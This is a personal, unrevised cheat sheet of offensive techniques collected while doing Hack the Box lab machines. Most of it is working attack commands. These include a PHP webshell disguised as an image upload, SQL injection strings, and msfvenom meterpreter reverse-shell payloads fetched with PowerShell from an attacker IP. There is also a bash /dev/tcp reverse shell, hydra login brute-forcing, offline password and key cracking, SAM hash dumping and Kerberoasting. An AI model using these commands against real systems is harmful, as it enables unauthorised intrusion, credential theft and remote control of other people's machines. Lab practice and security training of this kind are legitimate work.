Tricks learned while working on the Hack the Box lab (personal, non-revised, dirty)

python -m SimpleHTTPServer
python3 -m http.server

' or 1 = 1--
user'-- -

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

python3 -c "import pty; pty.spawn('/bin/bash')"

The press ctrl + z

Then run: stty raw -echo

Then write fg and press enter (note there's no output of fg)

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

This is useful when blind-exploiting a system, among other situations. Just dump the traffic of an interface to console:

tcpdump -i tun0 

Use post/multi/recon/local_exploit_suggester after a non-admin meterpreter session is created in order to get suggestions on which exploits could be executed next.

DNS servers are added to /etc/resolv.conf. It may be useful for when the server just accepts requests when host equals to machineName.htb. Otherwise the same could be achieved by adding an entry to the file /etc/hosts.

Use nslookup to get info from a DNS server:

nslookup
> SERVER {{serverip}}
or
> {{server name}}
> 

Use host to get the name servers' urls:

host -t ns {{domain name}}

Do a host transfer zone query:

host -l {{domain name}} {{name server}}

Use dig to get the name servers' urls:

dig -t ns {{url}}

Do a host transfer query:

dig axfr {{domain name}} @{{name server}}

Hackersploit on zone transfers: https://www.youtube.com/watch?v=kdYnSfzb3UA

Use smbmap to enumerate SMB. smbmap -H $HOST_IP

If when intercepting the server responses with a proxy and the 302 Found response has some content, the HTTP response number and code can be manually changed to, for example, 200 OK to see the content on the browser instead of following the redirect.

• If there are so many things that look the same, check if there's one of them that's different. In general, this can be files sizes, files contents, last modification date, etc.

mysql -u admin -p
mysql --host=localhost --user=myname --password mydb
mysql -h localhost -u myname -p mydb

show databases;
use {{dbname}}
show tables;

Run this from mysql to drop to a shell and see what user you are on: \! /bin/sh

• Upload a proper image with the intercept on the proxy
• From the proxy, keep the following code as the "image"'s content: {{imageMagicBytes}} <?php echo system($_REQUEST['whatever']); ?>
• Also change the file name and append .php (if the image name is image.gif, it would be image.gif.php)
• Access the file from the browser and add ?whatever={{command}}

Tip: The file command gets a file's type. It may be useful to test if the command says the file is an image. Tip2: Gif's magic bytes are GIF8;.

Use wpscan to scan Wordpress sites. If vulnerabilities are found, search for them on searchsploit.

Use droopscan to scan Drupal sites. If vulnerabilities are found, search for them on searchsploit.

Also, with Drupalgeddon it was possible to get a shell really quickly on HTB's Bastard machine: https://github.com/dreadlocked/Drupalgeddon2

Jar files can be decompiled to get information from them. First, unzip it using unzip, then decompile the unzipped .class file using the program jad.

Mainly for when there are several services running on the server, but it should be always done that way. After the initial nmap scan has finished, start several scans depending on the case. Eg if port 80 is open, trigger gobuster (with 2 lists, one short and one longer), nikto and maybe an nmap vuln scan.

nc -zv $HOST_IP $PORT

To scan all the ports with nmap add -p-.

For max speed while running scans don't forget to increase the number of threads.

Recursive enumeration is important whenever we run out of options.

Use: exiftool {{filename}} Note that browsers sometimes squash some metadata when downloading files, so download them using wget instead.

Great resource, do check out when Duckduckgoing.

When redis is available on the server, a common thing to try is to upload a file to gain access. https://book.hacktricks.xyz/pentesting/6379-pentesting-redis

Use strings {{filename}} to get strings from binaries. This may help find passwords or other sensitive information.

find . -writable

https://askubuntu.com/questions/350208/what-does-2-dev-null-mean

Use use {{filename}}

Use hash-identifier to identify the type of hash.

Paste the hash here https://hashes.org/search.php. For hashes grabbed using impacket-secretsdump, take the second part of the hash (after colon) and paste it there.

keywords: .htpasswd Even though it is possible to use the hash identifier to detect the hash type, also the hashcat's hash examples can be used:

hashcat --example-hashes

Crack:

hashcat -m {{mode id (check table in hashcat -h)}} {{path to the hash}} {{path to pass dict eg /usr/share/wordlists/rockyou.txt}}

If you run into an encrypted ssh key, that will start by something like this:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

Then the process of bruteforcing has 2 steps:

1. Transform from ssh format to john format: python /usr/share/john/ssh2john.py key.ssh > key.john.ssh
2. Bruteforce: john -wordlist={{wordlist path}} key.john.ssh

Apparently very common for many outdated Linux kernels. https://github.com/FireFart/dirtycow/blob/master/dirty.c

When a SUID program invokes another program just by its name without specifying location, it may be possible to do a PATH trick to make it execute the wrong one as root: inject another dir to the path that contains a program with the same name but performs something we want. (FIXME reword this)

It is possible to capture the system calls running strace {{program call}} and the library calls using ltrace {{program call}}.

base64 -w0 {{binary}}

If anonymous access is detected by, for example, an nmap scan, connect to it using user=anonymous and it does not really matter what is passed as password.

Get file types available:

msfvenom --help-formats

Generate a meterpreter reverse shell for windows (same for linux, just replace the word):

msfvenom -p windows/meterpreter/reverse_tcp LHOST={{attackerIP}} LPORT={{attackerPort}} -f {{fileType}} -o {{outputFile}}

When executed from the victim, it will trigger a reverse shell if there's a listener set up from Metasploit:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp

Then set options and run.

In the results, check the Hotfixes part to see if the system has been updated, and what updates it has.

Once there is a regular shell available, it may be useful to upgrade it to a meterpreter shell to use metasploit modules to, for example, escalate privileges.

Generate executable using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.19 LPORT=6666 -f exe -o hola.exe

When working with Windows x64, use windows/x64/meterpreter/reverse_tcp as payload instead.

After making hola.exe available through a web server on the attacker machine (use Python http simple web server for that), download it using Powershell on the target machine:

powershell "(New-Object System.Net.Webclient).Downloadfile('http://10.10.14.19:8000/hola.exe', 'meterpreter.exe')"

Use the multi handler module to listen to connections on the attacker machine:

use multi/handler
set LPORT 6666
set LHOST tun0
run

Execute meterpreter.exe on the victim machine and the listener should pop a meterpreter shell.

df -lh

There are several ways to do data recovery from a device:

1. strings /dev/devicename: This will get all the strings on the device and may include deleted files' strings.
2. xxd /dev/devicename: Does a hexdump of all the contents of the device.
3. Check ippsec's Mirai walkthrough for hints on how to use https://www.youtube.com/watch?v=YRsfX6DW10E

Have you Googled {{app|service|platform}} remote code execution?

When intercepting a request with Burp, if the information that is being sent to the server eg. a url command to trigger a reverse shell, is sent as a query string, select it and press ctrl + u to url-encode it.

If the box has the port 443 open, check certificate info. Subdomains and email addresses could be taken from there.

http://rumkin.com/tools/cipher/

If a zip file requires a password to unzip, use fcrackzip to crack it:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt file.zip

Connect: mongo -p -u {{username}} {{dbname}} Insert: db.{{tablename}}.insert({datafield1: datavalue1})

When a file has the setuid flag set, it means it can be executed (or applied changes on) by anybody as they were the file's owner or as they belonged to the owner group. These files are great candidates for privilege escalation. To list them use: find / -perm 4000 2>/dev/null.

Sometimes there is a blacklisting method that prevents the inclusion of, for example, the word root, in a command or path. Using the interrogation marks can be helpful in some cases.

wfuzz -c -z file,/usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -z file,/usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-100.txt -d "username=FUZZ&password=FUZ2Z" {{url}}

Using a proxy or the browser itself save a complete login request (including body) and then just run the following:

sqlmap -r request.req

https://book.hacktricks.xyz/pentesting-web/nosql-injection https://medium.com/bugbountywriteup/nosql-injection-8732c2140576

https://github.com/DominicBreuker/stego-toolkit

Go-to folder when there are web apps running on the server.

Create private key: openssl genrsa -aes256 -out ca.key 4096

Create public certificate: openssl req -new -x509 -days 365 -key ca.key -out ca.crt

Generate key: openssl req -newkey rsa:2048 -nodes -keyout mysite.key -out mysite.csr

Note that csr means certificate signing request.

Sign key: openssl x509 -req -days 365 -in mysite.csr -CA ca.crt -CAkey ca.key -set_serial 01 -out mysite.crt

Generate key openssl req -newkey rsa:2048 -nodes -keyout username.key -out username.csr

Sign user certificate openssl x509 -req -days 365 -in username.csr -CA ca.crt -CAkey ca.key -set_serial 02 -out username.crt

Generate pfx to be imported in the browser openssl pkcs12 -export -out username.pfx -inkey username.key -in username.crt

openssl pkey -in privatekey.key -pubout

openssl x509 -in cert.crt -pubkey -noout

When a folder has execution permission but not read permission, it will not allow to list contents of the folder using ls, but it will allow to cd to any folder or open files in that folder if you already know their names and have permissions to read them.

$ echo "$((2#0111))"

hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top1000.txt staging-order.mango.htb http-post-form "/:username=^USER^&password=^PASS^&login=login:Log in for ordering" -V

hydra -L users.txt -P passwords.txt ssh://10.10.10.184

https://gtfobins.github.io/gtfobins/

Piping any command to less -S will shorten lines for them to fit in the terminal.

Use wpscan to enumerate wordpress sites.

Use magescan to enumerate magento sites.

php magescan.phar scan:all www.example.com

If bash shell is not working, try wrapping it in a bash -c call.

"bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'"

https://gtfobins.github.io

It is possible to use 7z to list files included in a vhd file:

7z l file.vhd

To extract them:

7z x file.vhd

Preferred option: mount it:

guestmount --add {{file.vhd}} --inspector --ro /mnt/vhd -v

Grab the files SAM and SYSTEM from Windows/system32/config.

Then to grab hashes from them:

impacket-secretsdump -sam SAM -system SYSTEM local

Notes on this:

• If a hash begins with aad3 or 31d6 it's a blank hash (it depends on the type of hash that's going to be one or the other)

It may be also useful to check if Groups.xml is around. This file contains the user's password hash that can be reverted using gpp-decrypt

Also check if nsclient is installed. It eventually allows code execution.

Get password: nscp.exe web -- password --display Set new password: nscp.exe web -- password --set {{new-password}}

Get AD users:

python GetADUsers.py -all -dc-ip 10.10.10.100 active.htb/SVC_TGS

In this case the user active.htb/SVC_TGS was obtained from the Groups.xml file.

To run sharphound which collects Active Directory information, we run a command prompt from Windows as the user we have active directory credentials for. Then we launch sharphound

runas /netonly /user:{{domain eg. active.htb}}\{{user eg. svc_tgs}} cmd

In the new command prompt:

SharpHound.exe -d {{domain eg active.htb}} --domaincontroller {{ip domain controller}} -c all

Find sharphound.exe in bloodhound repo / Collectors.

Import the file generated with sharphound to bloodhound to query. There are several pre-loaded queries. For example, it is possible to check if a user is kerberoastable.

If Bloodhound indicates a user is kerberoastable, then run the following to retrieve the kerberos password hash:

GetUserSPNs.py  -request -dc-ip {{if of the domain controller}} {{user as which is being run with domain (password needed) e.g. active.htb/svc_tgs}}

Windows: 128ms

PING 10.10.10.184 (10.10.10.184) 56(84) bytes of data.
64 bytes from 10.10.10.184: icmp_seq=1 ttl=127 time=182 ms

Linux: 64ms

PING localhost(localhost (::1)) 56 data bytes
64 bytes from localhost (::1): icmp_seq=1 ttl=64 time=0.020 ms

MacOS: 64ms

PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.049 ms

Check http responses and take screenshots:

cat hosts.txt | aquatone